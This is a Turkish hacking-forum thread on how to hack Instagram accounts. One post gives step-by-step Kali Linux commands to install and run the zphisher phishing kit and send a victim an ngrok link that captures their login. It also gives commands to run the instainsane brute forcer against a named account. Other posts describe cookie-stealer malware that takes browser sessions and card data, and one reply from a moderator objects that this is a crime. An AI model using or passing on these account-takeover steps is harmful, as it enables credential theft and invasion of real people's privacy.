İnstagram Hesapları Nasil Hacklenir ?

Klaxxon

Katılımcı Üye
5 Şub 2022
773
782
Çerez çalma olayını açıklar mısınız?
stealer dediğimiz ratlar var burda konusunu açtım ama bi yöneticimiz bişey yazmadan çöpe aldığı için göremiceksin konumu ama bu stealer dediğimiz olay senin tarayıcında taki tüm cookieler steam telegram discord kredi kartı gibi hep sini çeker olay bu

WYS-eevee

Üye
14 Kas 2021
144
84
Ransomware
Eline sağlık ama hiç işime yaramadı instagram hesap çalma konusu hakkında yüzlerce konu acılmışken neden bir daha konu açma gereği duyuyon forumu kirletmekten başka bi işi yok.

Hayzadxx

Katılımcı Üye
27 Haz 2022
400
112
evet fark var merakımdan soruyorum bana rat atmayı biraz açıklayabilirmisin? veya önerebilecegin bir yer varmı.
Rat exploit gibi exploit çok uzun bi tanım sana şöyle soyeleyeyim kötü yazılım rat da aynısı neredeyse bunun için yazılım bilgin olmali ve kendi rat ini kendin yazmalisin

314Kachu

Üye
8 Eyl 2009
228
167
Seni seçtim 3.14Kachu
selamlar ben hayzadxx bugün sizlerle instagram hesab nasıl alınır buna bakıcaz öncelikle belirli 2 attack vardır bunlar
1)pihising (oltalama)
2)brutfroce (kaba kuvvet)

Pihising oltalama taktigidir bu taktik genellikle çok kullanılır peki nasıl yapılıyor

Bir web sitesinin birebir aynısını veya benzerini yapmaya pihising denir ve bunu hedef yani kurbana gönderirler kurban hicbisey anlamaz heleki profesyonel bi pihising se
ve instagram gibi giriş yaparak hesabına girmeye çalışır fakat giremez çünkü site eror verir ve kullanıcı adı ve şifre attacker in yani saldırganın terminaline düşer böylelikle çok rahat hesaba erişebilir siz siz olun böyle şeyler e itibar etmeyin peki nasıl yapılır?

Kali linux terminalinizi açın ve bu kodları teker teker yazın
1) apt-get update
2) apt-get upgrade
3) git clone --depth=1 GitHub - htr-tech/zphisher: An automated phishing tool with 30+ templates. This Tool is made for educational purpose only ! Author will not be responsible for any misuse of this toolkit !
4) cd zphisher
5)bash zphisher.sh
Evet önünüze bi ekran çıktı ordan istagram i yani 02 diyoruz sonra 3 seçenek daha çıkacak ben ngrok öneriyorum ama sizin tercihiniz ngrok için 02 diyoruz sonra bize bi link verecektir o linki hedefe atıyorsunuz hedef linke giriş yaptığında sizin terminalinize düşecek böylelikle hesaba erişiminiz olacak

~BRUTFROCE ~
Brutfroce deneme yanılma yöntemidir bunun için bi wordlist.txt dosyası ve proxy.txt dosyasına ihtiyacınız olacaktır fakat bazı toolarda proxy.txt istemez
Brutfroce şuanda yaygin kullanılmamaktadır fakat eskiden cok kullanılır di brutfroce icin cok iyi bir wordlist iniz olmali simdi toola geçiyoruz

Kali root terminaline root olmasi gerk
1) git clone GitHub - umeshshinde19/instainsane: Multi-threaded Instagram Brute Forcer (100 attemps at once)
2) cd instainsane
3)chmod +x instainsane.sh
4)chmod +x install.sh
5)sudo ./install.sh
6)sudo ./instainsane.sh

Evet simdi cikan ekranda brutfroce yapacağınız hesabin ismi yazin sonra wordlist soracaktir onu wordlistiniz yoksa enterleyin sonra saldırı başlayacaktır şifreyi buldugunda söyleyecektir ztn

Umarım işinize yaratmıştır ♡
Merhaba,
öncelikle Forum kuralları'nı okumanızı tavsiye ederim. Başka insanların özel hayatına müdehale bir suçtur. Bunu açıkca yapmak ve yapmaya teşvik etmek bana pek doğru bir davranış olarak gelmedi. Daha faydalı konular paylaşabilirsiniz diye düşünüyorum.
Saygılar.

Klaxxon

Katılımcı Üye
5 Şub 2022
773
782
Kardeş bu kadar biliyorsan yöntemi sen bize anlat biz de yararlanalım ne diye adamı küçümsüyorsun adam öğretmeye çalışıyor
Ben kimseyi küçümsemem dediğim doğru public toollar hiç bir zaman işe yaramaz önemli olan özel olarak kodlanmış toollar idir ben sana zaten yöntemi söyledim pass the cookie yaparım dedim konularınıda açtım forumda gidip bakabilirsin.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.